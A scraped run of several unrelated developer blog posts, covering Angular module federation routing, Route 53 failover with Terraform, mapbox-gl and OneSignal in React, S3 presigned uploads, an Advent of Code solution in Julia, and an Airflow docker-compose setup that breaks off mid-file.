In `bootstrap.ts` we will consume this asset and build the injection token value:
```ts
import { enableProdMode } from '@angular/core';
import { platformBrowserDynamic } from '@angular/platform-browser-dynamic';
import { Routes } from '@angular/router';
import { loadRemoteModule } from '@angular-architects/module-federation';
import { AppModule } from './app/app.module';
import { PLATFORM_ROUTES } from './app/platform-routes';
import { environment } from './environments/environment';
if (environment.production) {
enableProdMode();
}
fetch('/assets/platform-config.json').then(async (res) => {
const config = await res.json();
const platformRoutes: Routes = [];
for (const [key, value] of Object.entries<any>(config)) {
platformRoutes.push({
path: value.path,
loadChildren: () =>
loadRemoteModule({
remoteEntry: value.remoteEntry,
remoteName: value.remoteName,
exposedModule: value.exposedModule,
}).then((m) => m[value.exposedModuleName]),
});
}
platformBrowserDynamic([
{
provide: PLATFORM_ROUTES,
useValue: platformRoutes,
multi: true,
},
])
.bootstrapModule(AppModule)
.catch((err) => console.error(err));
});
```
By passing the providers to `platformBrowserDynamic`, we are setting a static provider value prior to bootstrap, that can be used on bootstrap.
In the module responsible for your shell app's router module declaration (typically `app-routing.module.ts`), update as follows:
```ts
import { NgModule } from '@angular/core';
import { RouterModule, ROUTES, Routes } from '@angular/router';
import { PLATFORM_ROUTES } from './platform-routes';
@NgModule({
imports: [
RouterModule.forRoot(
[
/* Declare root routes in the factory below */
],
{ initialNavigation: 'enabled' }
),
{
ngModule: RouterModule,
providers: [
{
provide: ROUTES,
useFactory: (
staticRoutes: Routes = [],
dynamicRoutes: Routes = []
) => {
let rootRoutes: Routes = [];
if (Array.isArray(staticRoutes)) {
rootRoutes = [...staticRoutes];
}
if (Array.isArray(dynamicRoutes)) {
rootRoutes = [...rootRoutes, ...dynamicRoutes];
}
rootRoutes.push({
path: '**',
redirectTo: '/authentication/login',
});
return rootRoutes;
},
deps: [ROUTES, PLATFORM_ROUTES],
},
],
},
],
exports: [RouterModule],
})
export class AppRoutingModule {}
```
Let's explain a bit...
`RouterModule.forRoot([])` establishes a lot of necessary providers and functionality required for routing. Under the hood, all router modules roll-up the route definition to an injection token named `ROUTES`. We can bootstrap the module and immediately provide a new value on-top for the `ROUTES` value.
To allow our shell app to have it's own built-in routes as well as the dynamic runtime routes, we use a factory to concat `rootRoutes` and the dynamicRoutes (from our injection token `PLATFORM_ROUTES`).
Lastly, we have a fallback route, as routes will execute first-to-last, to handle global redirect behavior for unhandled routes.
## Conclusion
At this point, we are rolling. We can now change our config while serving the different remotes and shell and see it swap out the served bundle. In a real environment, the config data would come from an endpoint.

If you read this far I appreciate it. Module federation in Angular is a very new concept and I welcome feedback and questions on this topic! | seanperkins |
708,593 | AWS Route 53 with Terraform | In this article we will imagine that your team received two very important pieces of information. The... | 0 | 2021-05-25T21:53:01 | https://augustovaldivia.ca/r53.html | aws, terraform, awsroute53, cdn | In this article we will imagine that your team received two very important pieces of information. The first being about issues regarding the company website and the second being about the future of your company.
First, the Social media team has revealed to your team that a significant proportion of your customer base are leaving bad reviews about the stability of your website. Customers describe that the website has been down frequently during the past month on different days of the week and at random times during the day.
Secondly and part of the good news is that the company started looking into moving their online business from their on-premise environment to a public cloud provider.
For this project the company’s main requirements are:
- Scalable cloud Domain Name System (DNS) webserver
- Very reliable
- Highly available
- Cost effective
Your team received the task to conduct research on the three big public cloud providers on the market and to create a presentation with the best options for this migration. Your manager has given you the task to provide details about Amazon Website Services (AWS) DNS server and to present a proof of concept (POC) in front of your company directors to provide a representation of what this infrastructure would look like in the cloud.
**Research stage**
As your research advances you discover that AWS-Route53 provides the following functions:
- Domain registration
- DNS service
- Health checking
-Private DNS resolution within VPC’s using private hosted zone
***Looking promising already – right?***
**Development stage**
Looking at the research stage looks like AWS-Route53 has great components that could help with company requirements.
**How can AWS-Route53 could help us with our issue?**
Health checking is a great feature that AWS-Route53 uses to send automated requests over the internet to applications verifying that it is working, accessible and available. In addition, AWS-Route53 has different policies that can be used under different circumstances.
**Types of policies:**
- Routing policies
- Simple routing policy
- Weighted routing policy
- Latency based routing policy
- Failover routing policy
- Geolocation routing policy
**In this stage you will focus on building and deploying the following AWS-services:**
- Availability zone
- VPC
- Public subnet
- Internet gateway
- Route table
- EC2
- Security groups
- Elastic Ip
- Route 53
- S3 bucket
**For readability some services are not included on this diagram: AWS-Route 53 Failover routing policy**


**Conclusion**
On the day of your presentation, you will be able to showcase a full AWS-Route53 Failover routing policy demo where a primary record, the EC2 instance, will automatically switch over to a secondary backup record, an S3 bucket, after the primary indicated a failure on the AWS-Route53 health check. And because you are all about code you will be using Terraform to provision this deployment.
>"Everything fails, all the time"
[AWS CTO, Werner Vogels](https://cacm.acm.org/magazines/2020/2/242334-everything-fails-all-the-time/fulltext)
And servers that host websites are no exception. Servers and systems can fail for several reasons. However, having backup plans ensures that when such problems occur users of the application do not experience any downtime.
**Note** to be able to complete this project you will need a domain.
**Functions, arguments and expressions of Terraform that were used in the above project:**
[providers](https://www.terraform.io/docs/language/providers/index.html)
[variables](https://www.terraform.io/docs/language/values/index.html)
[modules](https://www.terraform.io/docs/language/modules/index.html)
[resources](https://www.terraform.io/docs/language/resources/index.html)
[types and values](https://www.terraform.io/docs/language/expressions/types.html)
[Find the Terraform repo and directions for this project here](https://github.com/ValAug/AWS_Route53_Terraform)
| valaug |
739,066 | Managing mapbox-gl state in React app | Description of the problem In the course of my work at geoalert.io, I have repeatedly... | 0 | 2021-06-25T11:11:05 | https://dev.to/dqunbp/managing-mapbox-gl-state-in-react-app-4328 | react, mapbox, xstate, javascript | ## Description of the problem
In the course of my work at [geoalert.io](http://geoalert.io/), I have repeatedly encountered the problem of managing the state of an application in `React` with a built-in [mapbox-gl](https://docs.mapbox.com/mapbox-gl-js/api/)
I plan to cover the topic in a series of articles, including this one:
- Managing `mapbox-gl` state in `React` app
- [Using `mapbox-gl` in `React` with `Next.js`](https://dev.to/dqunbp/using-mapbox-gl-in-react-with-next-js-2glg)
- Managing the state of a `React` application with `mapbox-gl` using `XState`
The last two articles mentioned correspond to the 2 main problems I encountered while using `mapbox-gl` in `React`
- Embedding `mapbox-gl` in `React` - storing the built-in `mapbox-gl` instance and making it accessible from other app components
- Managing the state of a `React` app with `mapbox-gl` - since `mapbox-gl` has an internal state, you need to synchronize it with the state of the app itself
## Embedding `mapbox-gl`in `React`
There are several options for solving this problem, here are the most popular among them:
- Using ready-made wrapper libraries
- Self-native integration, for this option I would highlight 2 cases
- Implementing as a `React Component`
- Storing the map instance outside of `React`
### Using ready-made wrapper libraries
The most popular among them
- [react-map-gl](https://github.com/visgl/react-map-gl) - is a solution from [uber](https://www.uber.com/), perhaps the most sophisticated among others, one of the main drawbacks:
- Steep learning curve, having sufficiently rich functionality, including for managing state, it is rather difficult to understand the library api
- Has [almost 1MB bundle size](https://bundlephobia.com/package/react-map-gl@6.1.16), which is quite a lot
- [react-mapbox-gl](https://github.com/alex3165/react-mapbox-gl) - ranks second in popularity, has an order of magnitude smaller bundle size and more concise and easy-to-understand api
- [@urbica/react-map-gl](https://github.com/urbica/react-map-gl) - the size of the bundle and api is about the same as [react-mapbox-gl](https://github.com/alex3165/react-mapbox-gl)
- [use-mapbox-gl](https://github.com/dqunbp/use-mapbox-gl) - I will use the opportunity to attach my solution, this is a lightweight React hook wrapping `mapbox-gl`
### Self-service native integration
#### Implementing as a `React Component`
The main idea of this approach is to create a web map component, which must contain a `DOM` node for initializing the map, initialization logic, and it must also store an instance of the created map
The `mapbox-gl` documentation contains [instructions](https://docs.mapbox.com/help/tutorials/use-mapbox-gl-js-with-react/) on how to do this for a new `React` application.
Continuation and more detailed consideration of this issue, with various examples of implementation, wait in the next article
{% link https://dev.to/dqunbp/using-mapbox-gl-in-react-with-next-js-2glg %}
#### Storing the map instance outside of `React`
An example of such an implementation will also be considered in the next article
## Managing state of `React` app with `mapbox-gl`using `XState`
As a rule, tutorials on using `mapbox-gl` in `React` end after the method of integrating the first into the second is described, articles about state management in such applications are rare, most articles on this topic are outdated at the moment
[Here's an example](https://medium.com/critigenopensource/an-approach-to-integrating-mapboxgl-in-react-redux-b50d82bc0ed0) of a nice article from [@Cole Beese](https://medium.com/@cole.bessee)
This article describes an example of state management with Redux using [React class components](https://reactjs.org/docs/components-and-props.html)
As mentioned above `mapbox-gl` has internal state for example properties such as
- Map center coordinates
- Zoom
- Bearing
- Current map style
- Vector or raster user layers
- etc.
Usually in the application interface, in addition to the map itself, there are elements whose display depends on the internal state of the map, for example, an element that displays the current coordinates and zoom, [as in the above example](https://docs.mapbox.com/help/tutorials/use-mapbox-gl-js-with-react/)

In addition to the state inside the map instance, the application can also have its own internal state, in our case, [XState](https://github.com/davidkpiano/xstate) will be used for this
I'll cover this in more detail with an example of using `XState` in my next post
Useful links:
- [MAPBOX GL JS + REACT](https://www.mapbox.com/blog/mapbox-gl-js-react)
- [Use Mapbox GL JS in a React app](https://docs.mapbox.com/help/tutorials/use-mapbox-gl-js-with-react/)
- [An approach to integrating MapboxGL in React / Redux](https://medium.com/critigenopensource/an-approach-to-integrating-mapboxgl-in-react-redux-b50d82bc0ed0) | dqunbp |
739,737 | How to Add Push Notifications into a ReactJS App | Push notifications are a useful tool to engage and retain users. In this tutorial, we'll show you... | 0 | 2021-06-28T16:48:32 | https://onesignal.com/blog/how-to-integrate-push-notifications-in-react/ | react, webdev, javascript, frontend | ---
title: How to Add Push Notifications into a ReactJS App
published: true
date: 2021-06-25 22:53:02 UTC
tags: react, webdev, javascript, frontend
canonical_url: https://onesignal.com/blog/how-to-integrate-push-notifications-in-react/
---

Push notifications are a useful tool to engage and retain users. In this tutorial, we'll show you how to integrate with OneSignal for free in order to leverage push notifications in your ReactJS app.
## **OneSignal & Your Browser's Push API**
The browser's push API gives web applications the ability to receive messages from a server whether or not the web app is in the foreground or currently loaded on a user agent. This lets you deliver asynchronous notifications and updates to users who opt-in, resulting in better engagement with timely new content.
This tutorial will cover how to integrate OneSignal push notifications into your app using our typical setup process. Part one of this guide covers the OneSignal setup process. Part two of this guide covers how to integrate with ReactJS using a basic setup method. Part three covers an advanced setup method you can implement after completing the basic setup. The advanced setup will unlock even more message customization and automation opportunities for your website or app.
## **Guide Overview**
- **[Part 1: Set Up Your OneSignal Account](#part-1-set-up-your-onesignal-account)**
- [Web Configuration](#web-configuration)
- **[Part 2: Quick Push Notification Setup In ReactJS](#part-2-quick-push-notification-setup-in-reactjs)**
- [Allow Web Push Notifications](#allow-web-push-notifications)
- [Send Web Push Notifications](#send-web-push-notifications)
- **[Part 3: Advanced Push Notification Setup In ReactJS](#part-3-advanced-push-notification-setup-in-reactjs)**
This tutorial requires some basic knowledge of React. I'm using the [Create React App](https://create-react-app.dev/) to generate my project and **NodeJS version 14.16**.
**Additional ReactJS Setup Resources:**
- [Quick React Setup](https://github.com/OneSignal/OneSignal-React-Sample/tree/quick-setup)
- [Advanced React Setup](https://github.com/OneSignal/OneSignal-React-Sample)
### Creating Your React App
Inside of your terminal run the following commands to create a new React project using Create React App:
<!--kg-card-begin: code-->
```shell
npx create-react-app react-onesignal
cd react-onesignal
npm start
```
<!--kg-card-end: code-->
For the official Create React App documentation, click [**here**](https://create-react-app.dev/docs/getting-started) **.**
## **Part 1: Set Up Your OneSignal Account**
To begin, [login](https://app.onesignal.com/login) to your OneSignal account or[create a free account](https://app.onesignal.com/signup). Then, click on the blue button entitled **New App/Website** to configure your OneSignal account to fit your app or website.
<!--kg-card-begin: image-->

<!--kg-card-end: image-->
Insert the name of your app or website. Select _ **Web Push** _ as your platform.
<!--kg-card-begin: image-->

<!--kg-card-end: image-->
Click on the blue button entitled, **Next: Configure Your Platform**.
### **Web Configuration**
Under **Choose Integration**, select the **Typical Site** option.
In the **Site Setup** section, enter your chosen web configuration. In my case, the configuration looks like this:
<!--kg-card-begin: image-->

<!--kg-card-end: image-->
Notice for testing purposes I’m entering my localhost URL (http://localhost:3000). If you are doing the same, make sure you click on the **LOCAL TESTING** option. This will ensure to treat HTTP localhost as HTTPS for testing.
Under **Permission Prompt Setup**, you will see three vertical blue dots under the **Actions** header on the far right side of the screen. Click on the blue dots and select **Edit** from the drop-down menu.
<!--kg-card-begin: image-->

<!--kg-card-end: image-->
A window will open with the configuration of our[push notification Slide Prompt](https://documentation.onesignal.com/docs/slide-prompt). Confirm that **Auto-prompt** is enabled (toggled to the right).
Under **Show When**, you can change the second increment to alter how long your slide prompt will delay after a user visits your page. You can leave it as it is, or you can reduce the seconds so that your prompt appears sooner. Once you've input your chosen delay increment, click the grey **Done** button located at the bottom right corner of the window.
<!--kg-card-begin: image-->

<!--kg-card-end: image-->
After clicking **Done**, scroll down to the bottom of the page and click **Save** to save your auto-prompt selections.
You will be redirected to a different page with an important step: Downloading the SDK files. Click **DOWNLOAD ONESIGNAL SDK FILES** and save them on your computer to retrieve later.
<!--kg-card-begin: image-->

<!--kg-card-end: image-->
Under the section entitled **Add Code to Site**, you will see a grey button that allows you to copy the code snippet. Click the grey **COPY CODE** button.
<!--kg-card-begin: image-->

<!--kg-card-end: image-->
## **Part 2: Quick Push Notification Setup In ReactJS**
In your ReactJS project folder, navigate to the **public** folder and open the **index.html** file. Inside of the head HTML tag, paste the code you previously copied from the OneSignal page.
Now, locate the SDK files you downloaded on your computer and insert them inside of the **src** folder of your ReactJS app.
<!--kg-card-begin: image-->

<!--kg-card-end: image-->
### **Allow Web Push Notifications**
Run the ReactJS app and visit your website. You should see the following prompt appear after your chosen time delay interval:
<!--kg-card-begin: image-->

<!--kg-card-end: image-->
Click on the blue **Allow** button to enable push notifications on your browser.
### **Send Web Push Notifications**
It’s time to send your first web push notification! To do so, login to your OneSignal account and navigate to the **Dashboard** tab. On the dashboard page, click on the blue button that says **New Push**.
<!--kg-card-begin: image-->

<!--kg-card-end: image-->
You will be redirected to a new window that will allow you to customize your push notification. Under **Audience**, make sure that **Send to Subscribed Users** is selected. Then, create your message by adding your message title, content, and an image. Because this is the first notification your subscribers will receive, you may choose to craft a simple welcome message to confirm that they've been subscribed and reinforce the value that notifications will provide.
Under the **Delivery Schedule** section, select **Immediately** and **Send to everyone at the same time** to send to all your current web push subscribers. If you have just finished setting up your OneSignal account, chances are you're the first and only subscriber. If your app or website is heavily trafficked and other users have already opted in to receive push notifications, you may want to select **Send to a particular segment(s)** to test your message out on a specific audience. When you're ready to send your message, click on the blue **Review and Send** button at the bottom of the screen.
<!--kg-card-begin: image-->

<!--kg-card-end: image-->
A small popup will appear for you to review your message. Once you are satisfied, click on the blue **Send Message** button. You should receive a web push notification on your device! 🚀
## **Part 3: Advanced Push Notification Setup In ReactJS**
If you want the ability to use OneSignal across your entire ReactJS app, complete these advanced push notification setup steps after completing the quick push notification setup.
Inside of your **index.html** file, remove the following code:
<!--kg-card-begin: code-->
```html
<script>
window.OneSignal = window.OneSignal || [];
OneSignal.push(function() {
OneSignal.init({
appId: "YOUR-APP-ID",
});
});
</script>
```
<!--kg-card-end: code-->
Make sure you keep the CDN link.
Inside of your **App.js** file, you will enter the following lines of code:
<!--kg-card-begin: code-->
```javascript
window.OneSignal = window.OneSignal || [];
const OneSignal = window.OneSignal;
```
<!--kg-card-end: code-->
The code above will make the `window` object aware of the `OneSignal` property. This will allow you to have access to the OneSignal SDK properties after the SDK has loaded into your web application.
In the same file we will create a `useEffect`. This hook will have the initialization code needed to trigger OneSignal. Remember to add the dependency array `[]` to your `useEffect` hook. The `init()` method from OneSignal can only be called once and the dependency array will help us to avoid that the useEffect gets triggered multiple times firing the `init()` method.
<!--kg-card-begin: code-->
```javascript
useEffect(() => {
OneSignal.push(() => {
OneSignal.init({
appId: "YOUR-APP-ID"
})
});
},[]);
```
<!--kg-card-end: code-->
Now, you can keep expanding your code to make use of different features of the OneSignal SDK across your ReactJS app by passing the `OneSignal` variable to different components. You can also use the [custom code setup](https://documentation.onesignal.com/docs/web-push-custom-code-setup) to modify the configurations of your prompt inside of your ReactJS application without using the OneSignal dashboard. To learn more about our Web Push SDK, visit our web push[SDK documentation](https://documentation.onesignal.com/docs/web-push-sdk). | devpato |
752,534 | Upload Files in a Web Application with AWS S3 | I recently finished building an application that allowed users to upload PDFs that I can then host... | 0 | 2021-08-13T12:31:12 | https://thomasstep.com/blog/uploading-files-in-a-web-application-with-aws-s3 | aws, react, javascript, webdev | ---
title: Upload Files in a Web Application with AWS S3
published: true
date: 2021-07-06 00:00:00 UTC
tags: [ aws, react, javascript, webdev ]
canonical_url: https://thomasstep.com/blog/uploading-files-in-a-web-application-with-aws-s3
---
I recently finished building an application that allowed users to [upload PDFs that I can then host and direct others to via a QR code](https://papyrusmenus.com/). I knew that I wanted to build the application using AWS and I figured that S3 would be my best option for storing the uploaded files, but I had never dealt with uploading files. The solution turned out to be easier than I expected, but it also was not super straightforward.
It turns out that handling an upload with HTML is just as easy as creating an [`input` tag with the type set to `file`](https://developer.mozilla.org/en-US/docs/Web/API/File/Using_files_from_web_applications). The `input` tag draws the `Browse...` button that everyone already knows and handles bringing up a user’s local file storage for choosing a file. I added an `onChange` event handler to the `input` tag which pulled the files from the event payload provided, verified the file type uploaded, verified that the file did not surpass my app’s maximum file size limit, then saved the file’s binary contents as the state. I subsequently had another button that uploaded the file selected, but for now, here is the code that handled a user selecting a file to upload.
```
async function captureFile(handleFileSelection) {
const MAX_SIZE = 1000000;
const files = event.target.files || event.dataTransfer.files;
if (files.length !== 1) {
return;
}
const file = files[0];
if (file.type !== 'application/pdf') {
return;
}
if (file.length > MAX_SIZE) {
return;
}
const fileBinary = await file.arrayBuffer();
setUploadedMenu(fileBinary);
return;
}
return (
...
<input type="file" onChange={handleFileSelection}/>
...
);
```
The button that saved the file needed to jump through one more hoop before actually uploading the file: requesting a presigned URL from the S3 bucket. Since I did not want to expose any AWS secrets to the browser, using a presigned URL was the preferred way of handling that upload. I gave the presigned URL a short lifespan and it already has credentials built in that allowed the browser to upload without needing AWS credentials. The browser makes some API calls to a protected API that has the correct permissions to the S3 bucket, which generated the presigned URL. The request from the browser that grabbed the presigned URL looked something like the following.
```
const response = await axios({
method: 'get',
url: '/api/get-presigned-url',
});
const { data: { presignedUrl } } = response;
```
After the presigned URL was returned, all I needed to do was `PUT` the file’s binary.
```
axios({
method: 'PUT',
url: presignedUrl,
headers: {
'Content-Type': 'application/pdf',
},
data: uploadedMenu,
timeout: 10000,
});
```
And just like that the user’s file uploads to my S3 bucket 🎉. It took a bit for me to get this code and sequence correct. The Lambda function I used to generate the presigned URL was lacking a few permissions at first. The URL was still generated, but since the Lambda generating it did not have proper permissions the `PUT` request was be denied at first. I also had some confusion around the data type that needed to be `PUT` to the S3. I ultimately ended up [going with an `ArrayBuffer`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/ArrayBuffer), but there may be other methods of uploading a file.
Until next time, we’ll see what I build next 🛠. | thomasstep |
923,932 | Advent of Code 2021 - Day 10 | It’s that time of year again! Just like last year, I’ll be posting my solutions to the Advent of Code... | 16,232 | 2021-12-11T22:11:12 | https://www.ericburden.work/blog/2021/12/11/advent-of-code-2021-day-10/ | julia, adventofcode, coding | ---
title: Advent of Code 2021 - Day 10
published: true
date: 2021-12-11 00:00:00 UTC
tags: julia, adventofcode, coding
canonical_url: https://www.ericburden.work/blog/2021/12/11/advent-of-code-2021-day-10/
series: Advent of Code 2021
---
It’s that time of year again! Just like last year, I’ll be posting my solutions to the [Advent of Code](https://adventofcode.com/) puzzles. This year, I’ll be solving the puzzles in [Julia](https://julialang.org). I’ll post my solutions and code to [GitHub](https://github.com/ericwburden/advent_of_code_2021) as well. I had a blast with AoC last year, first in R, then as a set of exercises for learning Rust, so I’m really excited to see what this year’s puzzles will bring. If you haven’t given AoC a try, I encourage you to do so along with me!
# Day 10 - Syntax Scoring
Find the problem description [HERE](https://adventofcode.com/2021/day/10).
## The Input - Simplicity Itself
I’m mostly just leaving this section in today for the sake of consistency. Reading in the data today is just a matter of reading each line and `collect`ing it into a `Vector{Char}`, then returning the list of lines.
```julia
function ingest(path)
return open(path) do f
[collect(line) for line in readlines(f)]
end
end
```
## Part One - Chunkopolypse
Ah, my favorite error message: “Everything is wrong!”. Essentially, each line consists of a string of brackets (in four different flavors) that is not well-formed in some way, either because some of the closing brackets are missing (called “incomplete”) or because an opening bracket is closed by an bracket that does not match (called “corrupted”). The “corrupted” bracket may be separated from the opening bracket by any number of opening and closing brackets. First, we need to identify all the “corrupted” closing brackets, get the corresponding score, then sum all the scores.
The simplest way I know to identify the “corrupted” closing bracket is to iterate over the characters from left to right, adding each opening bracket to the top of a stack. Whenever a closing bracket is found, check the top of the stack. If the two make a matched pair, remove the opening bracket from the top of the stack and move on. If not, then we’ve found our “corrupted” bracket!
```julia
# Some useful constants
OPENING_BRACKETS = Set(['(', '[', '{', '<'])
CLOSING_BRACKETS = Set([')', ']', '}', '>'])
MATCHES = Dict([
'(' => ')', '[' => ']', '{' => '}', '<' => '>',
')' => '(', ']' => '[', '}' => '{', '>' => '<'
])
POINTS = Dict([')' => 3, ']' => 57, '}' => 1197, '>' => 25137])
# Some useful utility functions
isopening(b) = b in OPENING_BRACKETS
isclosing(b) = b in CLOSING_BRACKETS
ismatch(lhs, rhs) = !ismissing(rhs) && !ismissing(lhs) && rhs == MATCHES[lhs]
# Search a line for the "corrupted" character by putting all opening
# brackets onto a stack, removing them when we find a match, and
# returning the unmatched bracket if it doesn't match.
function getcorruptedchar(line)
stack = []; sizehint!(stack, length(line))
for bracket in line
if isopening(bracket)
push!(stack, bracket)
continue
end
lastbracket = pop!(stack)
ismatch(lastbracket, bracket) && continue
return bracket
end
return missing
end
# Get the "corrupted" character from each line, look up its score,
# then add it to the total score.
function part1(input)
total = 0
for char in map(getcorruptedchar, input)
ismissing(char) && continue
total += POINTS[char]
end
return total
end
```
I feel like finding “balanced” brackets/parentheses is a pretty common problem. At least, it’s one I’ve seen pop up in a couple of different places, so it seems like this algorithm is a pretty good one to have on hand.
## Part Two - Stack Attack
Part two is very similar to part one, except now we’re iterating over our lines from back to front, and keeping “all” the unmatched brackets instead of just one.
```julia
# Another useful constant
SCORE_FOR = Dict([')' => 1, ']' => 2, '}' => 3, '>' => 4])
# And another utility function!
notcorrupted(line) = ismissing(getcorruptedchar(line))
# Similar to before. This time, we start adding brackets from
# the end of the line to our stack. If it's a closing bracket,
# we add it to our stack. If it's an opening bracket, we get the
# closing bracket off the top of our stack. If they match, we just
# keep going. If not, we add the bracket to our list of unmatched
# opening brackets.
function getclosingbrackets(line)
closingbrackets = []; sizehint!(closingbrackets, length(line))
stack = []; sizehint!(stack, length(line))
while !isempty(line)
bracket = pop!(line)
if isclosing(bracket)
push!(stack, bracket)
continue
end
if isopening(bracket)
stackbracket = isempty(stack) ? missing : pop!(stack)
ismatch(bracket, stackbracket) && continue
push!(closingbrackets, MATCHES[bracket])
end
end
return closingbrackets
end
# Given a list of opening brackets, look up each bracket's corresponding
# score and add it to a running total.
function calculatescore(unmatched)
total = 0
for bracket in unmatched
total *= 5
total += SCORE_FOR[bracket]
end
return total
end
# For each line, get the unmatched opening brackets, and calculate the
# score for that line. With all the line scores, we just sort them and
# return the score from the middle.
function part2(input)
(scores
= input
|> (lines -> filter(notcorrupted, lines))
|> (lines -> map(getclosingbrackets, lines))
|> (lines -> map(calculatescore, lines)))
sort!(scores)
middle = (length(scores) + 1) ÷ 2
return scores[middle]
end
```
Nice.It’s basically part one in reverse. No sweat!
# Wrap Up
This was a bit of a breather, but probably in large part because I’ve seen a couple of different variations on this puzzle before. I suspect it could be a bit tricky if you’re trying to come up with the algorithm from scratch. I don’t have a lot else to say about this one, so I’ll see you tomorrow!
If you found a different solution (or spotted a mistake in one of mine), please drop me a line! | ericwburden |
790,714 | New To Podcasting | We are new to podcasting, would love to hear from you all! Awkward Conversations & Dirty... | 0 | 2021-08-13T13:36:36 | https://dev.to/jackdlacy/new-to-podcasting-o8f | relationship | We are new to podcasting, would love to hear from you all!
Awkward Conversations & Dirty Secrets
Jack and Crystal Lacy
Spotify, Google, Apple, Anchor etc.
Thanks
Jack Lacy | jackdlacy |
792,408 | Airflow Quick Start With docker-compose on AWS EC2 | Airflow Quick Start With docker-compose on AWS EC2 | 14,113 | 2021-08-15T11:53:32 | https://dev.to/awscommunity-asean/airflow-quick-start-with-docker-compose-on-aws-ec2-fj3 | docker, ec2, cloudopz, airflow | ---
title: Airflow Quick Start With docker-compose on AWS EC2
published: true
description: Airflow Quick Start With docker-compose on AWS EC2
tags: docker, ec2, cloudopz, airflow
cover_image: https://github.com/vumdao/airflow-docker/blob/master/cover.jpg?raw=true
series: "Apache Airflow The Hard-Way"
---
## Abstract
For quick set up and start learning [Apache Airflow](https://airflow.apache.org/docs/apache-airflow/stable/index.html), we will deploy airflow using docker-compose and running on AWS EC2
## Table Of Contents
* [Introduction](#Introduction)
* [Additional PIP requirements](#Additional-PIP-requirements)
* [How to build customize airflow image](#How-to-build-customize-airflow-image)
* [Persistent airflow log, dags, and plugins](#Persistent-airflow-log,-dags,-and-plugins)
* [Using git-sync to up-to-date DAGs](#Using-git-sync-to-up-to-date-DAGs)
* [How to run](#How-to-run)
* [Add airflow connectors](#Add-airflow-connectors)
* [Understand airflow parameters in airflow.models](#Understand-airflow-parameters-in-airflow.models)
---
## 🚀 **Introduction** <a name="Introduction"></a>
The docker-compose.yaml contains several service definitions:
- airflow-scheduler - The scheduler monitors all tasks and DAGs, then triggers the task instances once their dependencies are complete.
- airflow-webserver - The webserver available at http://localhost:8080.
- airflow-worker - The worker that executes the tasks given by the scheduler.
- airflow-init - The initialization service.
- flower - The flower app for monitoring the environment. It is available at http://localhost:5555.
- postgres - The database.
- redis - The redis - broker that forwards messages from scheduler to worker.
Some directories in the container are mounted, which means that their contents are synchronized between the services and persistent.
- ./dags - you can put your DAG files here.
- ./logs - contains logs from task execution and scheduler.
- ./plugins - you can put your custom plugins here.
## 🚀 **Additional PIP requirements** <a name="Additional-PIP-requirements"></a>
- airflow image contains almost enough PIP packages for operating, but we still need to install extra packages such as clickhouse-driver, pandahouse and apache-airflow-providers-slack.
- Airflow from 2.1.1 supports ENV _PIP_ADDITIONAL_REQUIREMENTS to add additional requirements when starting all containers
```
_PIP_ADDITIONAL_REQUIREMENTS: 'pandahouse==0.2.7 clickhouse-driver==0.2.1 apache-airflow-providers-slack'
```
- It's not recommended to use this way on production, we should build the own image which contain all necessary pip packages then push to AWS ECR
## 🚀 How to build customize airflow image <a name="How-to-build-customize-airflow-image"></a>
- Build own image.
- `requirements.txt`
```
pandahouse
clickhouse-driver
```
- `Dockerfile`
```
FROM apache/airflow:2.1.2-python3.9
COPY requirements.txt .
RUN pip install -r requirements.txt
```
- `docker build -t my-airlfow .`
## 🚀 Persistent airflow log, dags, and plugins <a name="Persistent-airflow-log,-dags,-and-plugins"></a>
Not only persistent the folders but also share these ones between scheduler, worker and web-server
```
volumes:
- /mnt/airflow/dags:/opt/airflow/dags
- /mnt/airflow/logs:/opt/airflow/logs
- /mnt/airflow/plugins:/opt/airflow/plugins
- /mnt/airflow/data:/opt/airflow/data
```
## 🚀 Using git-sync to up-to-date DAGs <a name="Using-git-sync-to-up-to-date-DAGs"></a>
- The git-sync service will polling the registered project each 10s to clone the new commit to /dags
- We use HTTP method and Access key token to provide permission for the container
```
af-gitsync:
container_name: af-gitsync
image: k8s.gcr.io/git-sync/git-sync:v3.2.2
environment:
- GIT_SYNC_REV=HEAD
- GIT_SYNC_DEPTH=1
- GIT_SYNC_USERNAME=airflow
- GIT_SYNC_MAX_FAILURES=0
- GIT_KNOWN_HOSTS=false
- GIT_SYNC_DEST=repo
- GIT_SYNC_REPO=https://cloudopz.co/devops/airflow-dags.git
- GIT_SYNC_WAIT=60
- GIT_SYNC_TIMEOUT=120
- GIT_SYNC_ADD_USER=true
- GIT_SYNC_PASSWORD=
- GIT_SYNC_ROOT=/dags
- GIT_SYNC_BRANCH=master
volumes:
- /mnt/airflow/dags:/dags
```
## 🚀 How to run <a name="How-to-run"></a>
1. **Initializing Environment**
```
mkdir ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)\nAIRFLOW_GID=0" > .env
```
2. **Prepare `docker-compose.yaml`**
<details>
<summary>docker-compose.yaml</summary>
```
version: '3.5'
x-airflow-common:
&airflow-common
image: apache/airflow:2.1.2-python3.9
environment:
&airflow-common-env
AIRFLOW__CORE__EXECUTOR: CeleryExecutor
AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@af-pg/airflow
AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@af-pg/airflow
AIRFLOW__CELERY__BROKER_URL: redis://:@af-redis:6379/0
AIRFLOW__CORE__FERNET_KEY: ''
AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
AIRFLOW__API__AUTH_BACKEND: 'airflow.api.auth.backend.basic_auth'
AIRFLOW_CONN_RDB_CONN: 'postgresql://dbapplication_user:dbapplication_user@rdb:5432/postgres'
_PIP_ADDITIONAL_REQUIREMENTS: 'pandahouse==0.2.7 clickhouse-driver==0.2.1 apache-airflow-providers-slack'
volumes:
- /mnt/airflow/dags:/opt/airflow/dags
- /mnt/airflow/logs:/opt/airflow/logs
- /mnt/airflow/plugins:/opt/airflow/plugins
- /mnt/airflow/data:/opt/airflow/data
user: "${AIRFLOW_UID:-50000}:${AIRFLOW_GID:-50000}"
depends_on:
- af-redis
- af-pg
services:
af-pg:
image: postgres:13
container_name: af-pg
environment:
POSTGRES_USER: airflow
POSTGRES_PASSWORD: airflow
POSTGRES_DB: airflow
volumes:
- postgres-db-volume:/var/lib/postgresql/data
healthcheck:
test: ["CMD", "pg_isready", "-U", "airflow"]
interval: 5s
retries: 5
restart: always
af-redis:
container_name: af-redis
image: redis:latest
ports:
